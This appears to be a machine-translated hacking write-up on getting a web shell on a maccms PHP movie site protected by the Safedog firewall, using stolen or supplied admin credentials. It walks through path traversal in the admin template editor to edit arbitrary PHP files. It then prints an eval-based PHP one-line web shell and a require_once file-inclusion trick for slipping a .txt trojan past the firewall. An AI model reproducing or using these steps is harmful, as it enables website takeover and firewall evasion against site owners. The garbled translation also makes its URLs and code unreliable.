The maccms php version breaks through the security dog background to get webshell

Yesterday, I recorded the process, and there was no content. Similar articles certainly existed. If there were similarities, it would be a coincidence (the Chinese language is not very good, and we will take a look at it ):

Condition:
1. The movie site is in the maccms php version.
2. A dongle is installed on the server.
3. There is a background account password.

Of course, the first step is Baidu. Are there any related articles. It was found that a previous Upload Vulnerability test by Daniel failed. It is estimated that it has been officially fixed.

After entering the background, you can edit the template, for example:



Path:
Http://www.bkjia.com/admin/admin_templates.php? Action = edit & file = ../template/default/html/art.html

Then construct the following in IE:
Http://www.bkjia.com/admin/admin_templates.php? Action = edit & file = index. php
Get:



This is much more powerful than the ShopEx's back-end desk calendar directory. You can not only view the content, but also edit it.
In this way, you can use webshell. Low Content. In order not to destroy the program, I plan
This file is written with a backdoor.
Http://www.bkjia.com/admin/admin_templates.php? Action = edit & file = ../admin/version. php




Click Save



Access: http://0855. TV /admin/version.php safe dog prompt Interception:



There are a lot of PHP horses that have been used by Baidu's safedog. below is what I often use:



Of course, you can also add fault tolerance, and then write as follows:

Fuck you <? Php @ eval ($ _ POST ['a']);?>

The results are the same. Use PHP to access the client in one sentence (errors may occur if you use a kitchen knife ):



The file is successfully written.
In this way, we can use file inclusion to break through the safe dog (this seems to everyone on Earth knows. Shenma? You don't know? Baidu ).

I will not talk much about asp. Here we will talk about the PHP method:
Write a Trojan with the suffix txt (for example, dama.txt), and then write a PHP file in the same directory. The name is random and the content is as follows.

<? Php require_once ("dama.txt");?>



In this way, webshll will be ready?

Thanks to Comrade Leng for providing the website and background services.